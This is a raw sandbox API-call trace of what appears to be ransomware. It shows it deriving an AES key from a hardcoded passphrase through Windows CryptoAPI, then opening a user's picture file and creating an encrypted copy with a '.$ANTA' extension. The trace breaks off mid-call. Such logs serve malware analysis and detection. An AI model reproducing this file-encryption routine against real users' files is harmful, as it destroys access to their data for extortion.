RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0086.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0086.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0086.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0086.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0086.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0086.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0086.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0086.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0086.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0086.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0086.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0086.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da9ae0, ftCreationTime.dwHighDateTime=0x1d5ef3a, ftLastAccessTime.dwLowDateTime=0x802e2550, ftLastAccessTime.dwHighDateTime=0x1d5eeca, ftLastWriteTime.dwLowDateTime=0x802e2550, ftLastWriteTime.dwHighDateTime=0x1d5eeca, nFileSizeHigh=0x0, nFileSizeLow=0xc7e0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="0Vl-GMFm9nq0tPej.bmp", cAlternateFileName="0VL-GM~1.BMP")) returned 0x41ac600 [0086.405] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0086.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0086.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0086.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0086.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0086.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0086.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0086.407] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0086.407] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0086.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0086.407] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0086.407] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0086.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0086.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0086.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0086.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0086.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0086.485] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0086.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0086.486] PeekMessageW (in: lpMsg=0x144ea34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea34) returned 0 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0086.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0086.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0086.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0086.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797028, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0086.488] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0086.489] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0086.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0086.489] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0086.489] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0086.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0086.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.535] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0086.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0086.535] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0086.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0086.536] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0086.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca550, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0086.536] CryptHashData (hHash=0x41ac200, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0086.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.536] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0086.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca778, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0086.536] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac140) returned 1 [0086.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0086.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0086.537] CryptDestroyHash (hHash=0x41ac200) returned 1 [0086.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\0vl-gmfm9nq0tpej.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0086.537] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.537] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0086.537] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0086.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0086.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0086.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0086.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0086.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\0vl-gmfm9nq0tpej.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.539] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0086.539] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0086.539] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, 